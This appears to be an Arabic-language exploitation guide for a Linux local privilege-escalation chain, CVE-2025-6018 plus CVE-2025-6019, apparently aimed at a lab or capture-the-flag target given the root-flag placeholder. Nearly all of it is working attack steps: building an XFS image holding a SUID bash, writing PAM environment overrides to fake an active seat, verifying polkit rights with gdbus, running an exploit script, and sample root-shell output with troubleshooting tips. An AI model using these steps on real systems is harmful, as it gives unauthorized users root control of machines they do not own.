دليل رفع الامتيازات لـ CVE-2025-6018 + CVE-2025-6019
中文
📋 خطوات الاستغلال السريعة
الخطوة 1: إعداد صورة XFS (الجهاز المحلي)
# إنشاء صورة XFS بحجم 300 ميجابايت
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# تحميل الصورة وتثبيت SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# التحقق (يجب أن يظهر 300M)
ls -lh xfs.image
الخطوة 2: رفع الملفات إلى الهدف
الخطوة 3: أول تسجيل دخول - تكوين PAM
# تسجيل الدخول عبر SSH إلى الهدف
ssh [email protected]
# كتابة متغيرات بيئة PAM
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# التحقق من التكوين
cat ~/.pam_environment
# 🔥 هام: تسجيل الخروج (لتفعيل تكوين PAM)
exit
الخطوة 4: تسجيل الدخول الثاني - تنفيذ رفع الامتيازات
# إعادة تسجيل الدخول عبر SSH (تكوين PAM نشط الآن)
ssh [email protected]
# التحقق من نشاط PAM (يجب أن يُرجع "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# تنفيذ سكريبت رفع الامتيازات
bash exp.sh
✅ مؤشرات النجاح
إذا نجح الاستغلال، يجب أن ترى:
✓ تم العثور على SUID bash: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ تم تأكيد صلاحية الجذر!
════════════════════════════════════════════════════════════
║ علم الجذر ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
🔧 حل المشكلات
| المشكلة | الحل |
|---|
CanReboot يُرجع ('no',) |
📌 نقاط رئيسية
- ✅ يجب تسجيل الخروج وإعادة الدخول: تكوين PAM يُفعّل فقط في الجلسات الجديدة
- ✅ تحقق من CanReboot: تأكد من أنه يُرجع
('yes',) قبل تشغيل السكريبت
- ✅ استخدم تسجيل الدخول عبر SSH: لا تستخدم أسلوب التنفيذ
ssh -t user@host "cmd"
🐱 الحامي القطي
إذا فشل، تأكد من تنفيذ كل خطوة بدقة بالترتيب!